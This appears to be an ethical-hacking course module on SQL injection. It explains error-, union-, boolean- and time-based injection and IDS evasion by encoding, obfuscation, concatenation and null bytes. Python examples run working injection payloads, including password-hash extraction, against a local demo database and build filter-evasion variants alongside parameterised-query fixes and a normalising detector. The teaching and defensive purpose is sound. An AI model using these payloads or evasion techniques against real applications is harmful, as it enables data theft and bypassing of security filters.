Module 15: SQL Injection
Learn about SQL injection attack techniques, injection detection tools, and
countermeasures to detect and defend against SQL injection attempts.
Hands-On Lab Exercises: Over 4 hands-on exercises with real-life simulated
targets to build skills on how to:
> Perform an SQL injection attack against MSSQL to extract databases
> Detect SQL injection vulnerabilities using various SQL injection detection tools
Key topics covered:
> SQL Injection
> Types of SQL injection
> Blind SQL Injection
> SQL Injection Methodology
> SQL Injection Tools
> Signature Evasion Techniques
> SQL Injection Detection Tools
Section 01: SQL Injection Concepts
Structured query language (SQL)
Structured Query Language (SQL) is a domain-specific language used in programming and designed for managing data held in a relational database management system (RDBMS), or for stream processing in a relational data stream management system (RDSMS).
Structured query language (SQL) injection
In computing, SQL injection is a code injection technique used to attack data-driven applications: input supplied through an entry field (a form parameter, URL parameter, cookie or header) is concatenated into an SQL statement, so the attacker can change the statement the database executes (for example, to dump the database contents). The root cause is building SQL text from untrusted input instead of passing that input as a query parameter.
Error based SQLi
The attacker sends input that causes the database to return an error. The content of the error message (the fragment of SQL that failed, table or column names, the DBMS version) tells the attacker how the query is built and what the schema looks like, and confirms that raw SQL is being assembled from input.
Union based SQLi
This technique uses the SQL UNION operator, which combines the result sets of two or more SELECT statements into a single result set. By appending a UNION SELECT with the same number of columns as the original query, the attacker makes the application return rows from other tables in the same HTTP response that normally carries the legitimate results.
Boolean based SQLi
The attacker sends a query with an injected condition that is either true or false. The application's response differs depending on which it is (for example, a record is shown or not shown), so although no data is returned directly, the attacker learns one bit per request and can recover data one character at a time.
Time based SQLi
The attacker sends a query that makes the database pause for a number of seconds (for example WAITFOR DELAY on MSSQL or SLEEP() on MySQL) only when an injected condition is true. The HTTP response arrives either immediately or after the delay, so the response time reveals whether the condition was true or false even when the page content never changes. Boolean-based and time-based attacks are the two forms of blind SQL injection, used when the application displays neither query results nor error messages.
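The four techniques above, worked through against a small database. This is an added example, not code from the module; it assumes an in-memory SQLite database with constructed products and users tables so it runs offline (the same payloads apply to MSSQL or MySQL with minor syntax changes). Time-based probing is not shown because SQLite has no sleep primitive; on MSSQL the equivalent condition would be followed by WAITFOR DELAY, on MySQL by SLEEP(). The names search_vulnerable, search_safe and the helper functions are hypothetical.

```python
import sqlite3


def make_db():
    """Constructed in-memory database standing in for the application's backend.
    (Assumption: SQLite, chosen so the example runs offline.)"""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price_cents INTEGER);
        INSERT INTO products VALUES (1, 'widget', 999), (2, 'gadget', 1999);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO users VALUES (1, 'alice', 'a1b2c3'), (2, 'bob', 'd4e5f6');
    """)
    return conn


def search_vulnerable(conn, term):
    """The flaw: user input is concatenated straight into the SQL text."""
    sql = "SELECT name, price_cents FROM products WHERE name = '" + term + "'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """The fix: a parameterised query; the input never becomes SQL syntax."""
    sql = "SELECT name, price_cents FROM products WHERE name = ?"
    return conn.execute(sql, (term,)).fetchall()


def error_based_probe(conn):
    """Error-based: a lone quote breaks the statement. The DBMS error text proves
    raw SQL is being built and, on verbose applications, leaks schema details."""
    try:
        search_vulnerable(conn, "'")
        return None
    except sqlite3.Error as exc:
        return str(exc)


def union_attack(conn):
    """Union-based: a second SELECT with the same column count (2) is appended, so
    rows from the users table come back in the product-search response."""
    payload = "x' UNION SELECT username, password_hash FROM users--"
    return search_vulnerable(conn, payload)


def boolean_blind_extract(conn, column, where, max_len=32):
    """Boolean-based blind: the page only reveals whether the search matched, so a
    value is recovered one character at a time with yes/no questions."""
    recovered = ""
    for pos in range(1, max_len + 1):
        hit = None
        for code in range(32, 127):
            # 'widget' is a known-valid row, so the result is non-empty iff the
            # injected AND clause is true. unicode() of an empty substring is NULL,
            # which compares false and ends the loop past the end of the value.
            payload = (
                f"widget' AND unicode(substr((SELECT {column} FROM users WHERE {where}), "
                f"{pos}, 1)) = {code}--"
            )
            if search_vulnerable(conn, payload):
                hit = chr(code)
                break
        if hit is None:
            break
        recovered += hit
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("error-based:", error_based_probe(db))
    print("union-based:", union_attack(db))
    print("boolean-blind:", boolean_blind_extract(db, "password_hash", "username = 'alice'"))
    print("parameterised query sees the payload as data:",
          search_safe(db, "x' UNION SELECT username, password_hash FROM users--"))
```

The blind extraction needs roughly 95 requests per character in this naive form; real tools cut that down with a binary search over the character code, but the principle is the same: one true/false answer per request.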
Remote code execution (RCE)
In computer security, arbitrary code execution (ACE) is an attacker's ability to run commands or code of their choice on a target machine or in a target process; when that ability is triggered over a network it is called remote code execution (RCE). An arbitrary code execution vulnerability is a security flaw in software or hardware that allows this. An SQL injection escalates to RCE when the injected statement can reach database features that run operating-system commands or write files on the server.
Section 02: Types of SQL Injection
Section 03: Evading Techniques
Intrusion detection system (IDS):
An intrusion detection system (IDS) is a device or software application that monitors a network or systems for malicious activity or policy violations; an intrusion prevention system (IPS) additionally blocks the traffic it flags. Signature-based IDS/IPS and web application firewalls match known injection patterns in requests, which is what the evasion techniques below are aimed at.
Encoding:
Character encoding is the process of assigning numbers to graphical characters, especially the written characters of human language, allowing them to be stored, transmitted, and transformed using digital computers. As an evasion technique, the attacker encodes the payload (URL percent-encoding, double encoding, hexadecimal or Unicode forms) so that a filter matching on the raw request does not see the signature, while the application or database decodes the input before executing it.
Obfuscation:
In software development, obfuscation is the act of creating source or machine code that is difficult for humans or computers to understand. Applied to SQL injection, the same payload is rewritten with inline comments in place of spaces, mixed-case keywords, alternative whitespace characters or equivalent expressions, so that it no longer matches a literal signature but is still parsed by the DBMS as the same statement.
Concatenation
String concatenation is the operation of joining character strings end-to-end; for example, the concatenation of "snow" and "ball" is "snowball". As an evasion technique, a keyword is split into pieces that the database joins back together at run time (for example 'SEL'+'ECT' on MSSQL, or CHAR() calls that build the string from character codes), so the signature string never appears in the request.
Null byte
The null character (also null terminator) is a control character with the value zero. It is present in many character sets, including ASCII (ISO/IEC 646), the C0 control codes, Unicode and EBCDIC, and it is available in nearly all mainstream programming languages. A null character can be placed in a URL with the percent code %00. Filters written in languages that treat the null byte as a string terminator may stop inspecting the input at that point, while the application behind them processes the whole string.
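The evasion techniques in this section side by side, and the normalisation a detector needs to defeat them. This is an added example, not code from the module or from any IDS/WAF product; the two-entry signature list, the naive_detect and robust_detect functions and the base payload are hypothetical and constructed for illustration. The naive check decodes once, case-sensitively, and stops at the first null byte the way a C string filter would; the robust check canonicalises first and then applies the same signatures.

```python
import re
from urllib.parse import quote, unquote

# Hypothetical signatures for illustration only; not from any real IDS/WAF ruleset.
SIGNATURES = ("UNION SELECT", "SELECT ")

# Constructed union-based payload used as the base for every evasion variant.
BASE_PAYLOAD = "x' UNION SELECT username, password_hash FROM users--"


def evasions(payload=BASE_PAYLOAD):
    """One transformed copy of the payload per evasion technique discussed in the text."""
    return {
        "plain": payload,
        # Encoding: one level of URL encoding, then a second level on top of it.
        "url_encoded": quote(payload, safe=""),
        "double_url_encoded": quote(quote(payload, safe=""), safe=""),
        # Obfuscation: inline comments instead of spaces; mixed case with %0a as separator.
        "inline_comments": payload.replace(" ", "/**/"),
        "mixed_case_newline": payload.replace("UNION SELECT", "uNiOn%0aSeLeCt"),
        # Null byte: a %00 prefix, aimed at filters that read input as a C string.
        "null_byte_prefix": "%00" + payload,
        # Concatenation (MSSQL-style literals): the keyword is split across two strings.
        "concatenated": "x'; EXEC('SEL'+'ECT username, password_hash FROM users')--",
    }


def naive_detect(raw):
    """Weak signature check: decodes once, stops at the first NUL like a C string,
    and matches case-sensitive literals with no whitespace or comment handling."""
    text = unquote(raw).split("\x00", 1)[0]
    return any(sig in text for sig in SIGNATURES)


def normalize(raw, max_rounds=5):
    """Canonicalise before matching: decode until stable, drop NULs, turn comments
    into spaces, re-join split string literals, collapse whitespace, upper-case."""
    text = raw
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    text = text.replace("\x00", "")
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.DOTALL)
    # 'SEL'+'ECT' -> 'SELECT' (MSSQL +), and the same for Oracle/PostgreSQL ||
    text = re.sub(r"'\s*(\+|\|\|)\s*'", "", text)
    text = re.sub(r"\s+", " ", text)
    return text.upper()


def robust_detect(raw):
    """The same literals applied to the normalised form of the request."""
    return any(sig in normalize(raw) for sig in SIGNATURES)


def compare(payload=BASE_PAYLOAD):
    """Map each variant name to (naive_result, robust_result)."""
    return {name: (naive_detect(v), robust_detect(v)) for name, v in evasions(payload).items()}


if __name__ == "__main__":
    for name, (naive, robust) in compare().items():
        print(f"{name:20s} naive={str(naive):5s} normalised={robust}")
```

Only the plain and singly encoded variants trip the naive check; every other variant passes it and is caught once the request is normalised. Normalisation has limits of its own (CHAR()-built strings or expressions the database evaluates cannot be folded without a parser), which is why signature matching is a detection aid and parameterised queries remain the actual fix.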